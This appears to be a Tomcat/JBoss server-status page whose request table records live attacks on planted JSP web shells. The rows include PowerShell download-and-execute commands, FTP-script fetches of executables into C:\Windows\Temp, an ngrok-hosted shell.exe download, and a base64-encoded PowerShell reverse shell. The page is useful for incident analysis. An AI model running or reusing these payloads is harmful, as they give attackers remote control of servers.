Free memory: 140.51 MB Total memory: 220.75 MB Max memory: 493.06 MB
Max threads: 40 Current thread count: 0 Current thread busy: 0
Max processing time: 0 ms Processing time: 0.0 s Request count: 0 Error count: 0 Bytes received: 0.00 MB Bytes sent: 0.00 MB
| Stage | Time | B Sent | B Recv | Client | VHost | Request |
|---|
P: Parse and prepare request S: Service F: Finishing R: Ready K: Keepalive
Max threads: 250 Current thread count: 80 Current thread busy: 42
Max processing time: 4833814 ms Processing time: 181615.2 s Request count: 405259 Error count: 40484 Bytes received: 22.62 MB Bytes sent: 6101.42 MB
| Stage | Time | B Sent | B Recv | Client | VHost | Request |
|---|---|---|---|---|---|---|
| S | 3862492448 ms | 0 KB | 0 KB | 192.3.194.202 | 81.45.140.46 | GET /jbossass/jbossass.jsp?ppp=powershell+iex%28New-Object+Net.WebClient%29.DownloadString%28%27http%3A%2F%2F89.34.27.167%2Flol.ps1%27%29 HTTP/1.1 |
| S | 3654620856 ms | 0 KB | 0 KB | 192.3.194.202 | 81.45.140.46 | GET /jbossass/jbossass.jsp?ppp=powershell+iex%28New-Object+Net.WebClient%29.DownloadString%28%27http%3A%2F%2F89.34.27.167%2Flol.ps1%27%29 HTTP/1.1 |
| S | 3653049304 ms | 0 KB | 0 KB | 192.3.194.202 | 81.45.140.46 | GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+89.34.27.167%3Ekiolsu.txt%26%40echo+binary%3E%3Ekiolsu.txt%26%40echo+get+%2Fwinscp1.exe+C%3A%5CWindows%5CTemp%5Cwinscp1.exe%3E%3Ekiolsu.txt%26%40echo+quit%3E%3Ekiolsu.txt%26%40ftp+-s%3Akiolsu.txt+-v+-A%26%40start+C%3A%5CWindows%5CTemp%5Cwinscp1.exe HTTP/1.1 |
| S | 3665841301 ms | 0 KB | 0 KB | 192.3.194.202 | 81.45.140.46 | GET /jbossass/jbossass.jsp?ppp=powershell+iex%28New-Object+Net.WebClient%29.DownloadString%28%27http%3A%2F%2F89.34.27.167%2Flol.ps1%27%29 HTTP/1.1 |
| S | 3653615004 ms | 0 KB | 0 KB | 192.3.194.202 | 81.45.140.46 | GET /jbossass/jbossass.jsp?ppp=powershell+iex%28New-Object+Net.WebClient%29.DownloadString%28%27http%3A%2F%2F89.34.27.167%2Flol.ps1%27%29 HTTP/1.1 |
| S | 3842337259 ms | 0 KB | 0 KB | 192.3.194.202 | 81.45.140.46 | GET /jbossass/jbossass.jsp?ppp=powershell+iex%28New-Object+Net.WebClient%29.DownloadString%28%27http%3A%2F%2F89.34.27.167%2Flol.ps1%27%29 HTTP/1.1 |
| S | 3862027838 ms | 0 KB | 0 KB | 192.3.194.202 | 81.45.140.46 | GET /jbossass/jbossass.jsp?ppp=powershell+iex%28New-Object+Net.WebClient%29.DownloadString%28%27http%3A%2F%2F89.34.27.167%2Flol.ps1%27%29 HTTP/1.1 |
| S | 2419281753 ms | 0 KB | 0 KB | 192.3.194.202 | 81.45.140.46 | GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+89.34.27.167%3Eps-16.txt%26%40echo+binary%3E%3Eps-16.txt%26%40echo+get+%2Fps1-6.exe+C%3A%5CWindows%5CTemp%5Cps1-6.exe%3E%3Eps-16.txt%26%40echo+quit%3E%3Eps-16.txt%26%40ftp+-s%3Aps-16.txt+-v+-A%26%40start+C%3A%5CWindows%5CTemp%5Cps1-6.exe HTTP/1.1 |
| S | 3653546739 ms | 0 KB | 0 KB | 192.3.194.202 | 81.45.140.46 | GET /jbossass/jbossass.jsp?ppp=powershell+iex%28New-Object+Net.WebClient%29.DownloadString%28%27http%3A%2F%2F89.34.27.167%2Flol.ps1%27%29 HTTP/1.1 |
| S | 3841878387 ms | 0 KB | 0 KB | 192.3.194.202 | 81.45.140.46 | GET /jbossass/jbossass.jsp?ppp=powershell+iex%28New-Object+Net.WebClient%29.DownloadString%28%27http%3A%2F%2F89.34.27.167%2Flol.ps1%27%29 HTTP/1.1 |
| S | 3807081575 ms | 0 KB | 0 KB | 192.3.194.202 | 81.45.140.46 | GET /jbossass/jbossass.jsp?ppp=powershell+iex%28New-Object+Net.WebClient%29.DownloadString%28%27http%3A%2F%2F89.34.27.167%2Flol.ps1%27%29 HTTP/1.1 |
| S | 3842616363 ms | 0 KB | 0 KB | 192.3.194.202 | 81.45.140.46 | GET /jbossass/jbossass.jsp?ppp=powershell+iex%28New-Object+Net.WebClient%29.DownloadString%28%27http%3A%2F%2F89.34.27.167%2Flol.ps1%27%29 HTTP/1.1 |
| S | 3652852388 ms | 0 KB | 0 KB | 192.3.194.202 | 81.45.140.46 | GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+89.34.27.167%3Ekiolsu.txt%26%40echo+binary%3E%3Ekiolsu.txt%26%40echo+get+%2Fwinscp1.exe+C%3A%5CWindows%5CTemp%5Cwinscp1.exe%3E%3Ekiolsu.txt%26%40echo+quit%3E%3Ekiolsu.txt%26%40ftp+-s%3Akiolsu.txt+-v+-A%26%40start+C%3A%5CWindows%5CTemp%5Cwinscp1.exe HTTP/1.1 |
| S | 3653714247 ms | 0 KB | 0 KB | 192.3.194.202 | 81.45.140.46 | GET /jbossass/jbossass.jsp?ppp=powershell+iex%28New-Object+Net.WebClient%29.DownloadString%28%27http%3A%2F%2F89.34.27.167%2Flol.ps1%27%29 HTTP/1.1 |
| S | 3185558359 ms | 0 KB | 0 KB | 192.3.194.202 | 81.45.140.46 | GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+89.34.27.167%3Eps-16.txt%26%40echo+binary%3E%3Eps-16.txt%26%40echo+get+%2Fps1-6.exe+C%3A%5CWindows%5CTemp%5Cps1-6.exe%3E%3Eps-16.txt%26%40echo+quit%3E%3Eps-16.txt%26%40ftp+-s%3Aps-16.txt+-v+-A%26%40start+C%3A%5CWindows%5CTemp%5Cps1-6.exe HTTP/1.1 |
| S | 3654277633 ms | 0 KB | 0 KB | 192.3.194.202 | 81.45.140.46 | GET /jbossass/jbossass.jsp?ppp=powershell+iex%28New-Object+Net.WebClient%29.DownloadString%28%27http%3A%2F%2F89.34.27.167%2Flol.ps1%27%29 HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| S | 96708252 ms | 0 KB | 0 KB | 104.200.67.3 | 81.45.140.46 | GET /jexws4/jexws4.jsp?ppp=powershell+-e+JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwADQALgAyADAAMAAuADYANwAuADMAIgAsADYAMQAxADcAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| S | 3579967673 ms | 0 KB | 0 KB | 192.3.194.202 | 81.45.140.46 | GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+89.34.27.167%3Ekiolsu.txt%26%40echo+binary%3E%3Ekiolsu.txt%26%40echo+get+%2Fwinscp1.exe+C%3A%5CWindows%5CTemp%5Cwinscp1.exe%3E%3Ekiolsu.txt%26%40echo+quit%3E%3Ekiolsu.txt%26%40ftp+-s%3Akiolsu.txt+-v+-A%26%40start+C%3A%5CWindows%5CTemp%5Cwinscp1.exe HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| S | 2832653293 ms | 0 KB | 0 KB | 138.121.172.62 | catalogo.museolazarogaldiano.es | GET //jexws4/jexws4.jsp?ppp=powershell+iex+%22%28New-Object+System.Net.WebClient%29.DownloadFile%28%27https%3A%2F%2F49f1-138-121-172-62.ngrok.io%2Fshell.exe%27%2C%27shell.exe%27%29%22 HTTP/1.1 |
| S | 3579583627 ms | 0 KB | 0 KB | 192.3.194.202 | 81.45.140.46 | GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+89.34.27.167%3Ekiolsu.txt%26%40echo+binary%3E%3Ekiolsu.txt%26%40echo+get+%2Fwinscp1.exe+C%3A%5CWindows%5CTemp%5Cwinscp1.exe%3E%3Ekiolsu.txt%26%40echo+quit%3E%3Ekiolsu.txt%26%40ftp+-s%3Akiolsu.txt+-v+-A%26%40start+C%3A%5CWindows%5CTemp%5Cwinscp1.exe HTTP/1.1 |
| S | 3268989740 ms | 0 KB | 0 KB | 192.3.194.202 | 81.45.140.46 | GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+89.34.27.167%3Ekisols.txt%26%40echo+binary%3E%3Ekisols.txt%26%40echo+get+%2Fopenvpn.exe+C%3A%5CWindows%5CTemp%5Copenvpn.exe%3E%3Ekisols.txt%26%40echo+quit%3E%3Ekisols.txt%26%40ftp+-s%3Akisols.txt+-v+-A%26%40start+C%3A%5CWindows%5CTemp%5Copenvpn.exe HTTP/1.1 |
| S | 1509802921 ms | 0 KB | 0 KB | 192.3.194.202 | 81.45.140.46 | GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+89.34.27.167%3Eps-16.txt%26%40echo+binary%3E%3Eps-16.txt%26%40echo+get+%2Fps1-6.exe+C%3A%5CWindows%5CTemp%5Cps1-6.exe%3E%3Eps-16.txt%26%40echo+quit%3E%3Eps-16.txt%26%40ftp+-s%3Aps-16.txt+-v+-A%26%40start+C%3A%5CWindows%5CTemp%5Cps1-6.exe HTTP/1.1 |
| S | 2832647066 ms | 0 KB | 0 KB | 138.121.172.62 | catalogo.museolazarogaldiano.es | GET //jexws4/jexws4.jsp?ppp=powershell+iex+%22%28New-Object+System.Net.WebClient%29.DownloadFile%28%27https%3A%2F%2F49f1-138-121-172-62.ngrok.io%2Fshell.exe%27%2C%27shell.exe%27%29%22 HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| S | 33411998 ms | 0 KB | 0 KB | 104.200.67.3 | 81.45.140.46 | GET /jexws4/jexws4.jsp?ppp=powershell+-e+JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwADQALgAyADAAMAAuADYANwAuADMAIgAsADYAMQAxADcAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| S | 3226698458 ms | 0 KB | 0 KB | 192.3.194.202 | 81.45.140.46 | GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+89.34.27.167%3Ekisols.txt%26%40echo+binary%3E%3Ekisols.txt%26%40echo+get+%2Fopenvpn.exe+C%3A%5CWindows%5CTemp%5Copenvpn.exe%3E%3Ekisols.txt%26%40echo+quit%3E%3Ekisols.txt%26%40ftp+-s%3Akisols.txt+-v+-A%26%40start+C%3A%5CWindows%5CTemp%5Copenvpn.exe HTTP/1.1 |
| S | 126 ms | 8 KB | 0 KB | 34.236.192.4 | catalogo.museolazarogaldiano.es | GET /status HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| S | 2832659525 ms | 0 KB | 0 KB | 138.121.172.62 | catalogo.museolazarogaldiano.es | GET //jexws4/jexws4.jsp?ppp=powershell+iex+%22%28New-Object+System.Net.WebClient%29.DownloadFile%28%27https%3A%2F%2F49f1-138-121-172-62.ngrok.io%2Fshell.exe%27%2C%27shell.exe%27%29%22 HTTP/1.1 |
| S | 3184969682 ms | 0 KB | 0 KB | 192.3.194.202 | 81.45.140.46 | GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+89.34.27.167%3Eps-16.txt%26%40echo+binary%3E%3Eps-16.txt%26%40echo+get+%2Fps1-6.exe+C%3A%5CWindows%5CTemp%5Cps1-6.exe%3E%3Eps-16.txt%26%40echo+quit%3E%3Eps-16.txt%26%40ftp+-s%3Aps-16.txt+-v+-A%26%40start+C%3A%5CWindows%5CTemp%5Cps1-6.exe HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| S | 3271223108 ms | 0 KB | 0 KB | 192.3.194.202 | 81.45.140.46 | GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+89.34.27.167%3Ekisols.txt%26%40echo+binary%3E%3Ekisols.txt%26%40echo+get+%2Fopenvpn.exe+C%3A%5CWindows%5CTemp%5Copenvpn.exe%3E%3Ekisols.txt%26%40echo+quit%3E%3Ekisols.txt%26%40ftp+-s%3Akisols.txt+-v+-A%26%40start+C%3A%5CWindows%5CTemp%5Copenvpn.exe HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| S | 1500090105 ms | 0 KB | 0 KB | 192.3.194.202 | 81.45.140.46 | GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+89.34.27.167%3Eps-16.txt%26%40echo+binary%3E%3Eps-16.txt%26%40echo+get+%2Fps1-6.exe+C%3A%5CWindows%5CTemp%5Cps1-6.exe%3E%3Eps-16.txt%26%40echo+quit%3E%3Eps-16.txt%26%40ftp+-s%3Aps-16.txt+-v+-A%26%40start+C%3A%5CWindows%5CTemp%5Cps1-6.exe HTTP/1.1 |
| S | 33405812 ms | 0 KB | 0 KB | 104.200.67.3 | 81.45.140.46 | GET /jexws4/jexws4.jsp?ppp=powershell+-e+JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwADQALgAyADAAMAAuADYANwAuADMAIgAsADYAMQAxADcAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| S | 94449941 ms | 0 KB | 0 KB | 104.200.67.3 | 81.45.140.46 | GET /jexws4/jexws4.jsp?ppp=powershell+-e+JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwADQALgAyADAAMAAuADYANwAuADMAIgAsADYAMQAxADcAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA HTTP/1.1 |
| S | 2832666090 ms | 0 KB | 0 KB | 138.121.172.62 | catalogo.museolazarogaldiano.es | GET //jexws4/jexws4.jsp?ppp=powershell+iex+%22%28New-Object+System.Net.WebClient%29.DownloadFile%28%27https%3A%2F%2F49f1-138-121-172-62.ngrok.io%2Fshell.exe%27%2C%27shell.exe%27%29%22 HTTP/1.1 |
| S | 91925945 ms | 0 KB | 0 KB | 104.200.67.3 | 81.45.140.46 | GET /jexws4/jexws4.jsp?ppp=powershell+-e+JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwADQALgAyADAAMAAuADYANwAuADMAIgAsADYAMQAxADcAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| S | 2418584199 ms | 0 KB | 0 KB | 192.3.194.202 | 81.45.140.46 | GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+89.34.27.167%3Eps-16.txt%26%40echo+binary%3E%3Eps-16.txt%26%40echo+get+%2Fps1-6.exe+C%3A%5CWindows%5CTemp%5Cps1-6.exe%3E%3Eps-16.txt%26%40echo+quit%3E%3Eps-16.txt%26%40ftp+-s%3Aps-16.txt+-v+-A%26%40start+C%3A%5CWindows%5CTemp%5Cps1-6.exe HTTP/1.1 |
| S | 24434831 ms | 0 KB | 0 KB | 104.200.67.3 | 81.45.140.46 | GET /jexws4/jexws4.jsp?ppp=powershell+-e+JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwADQALgAyADAAMAAuADYANwAuADMAIgAsADYAMQAxADcAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA HTTP/1.1 |
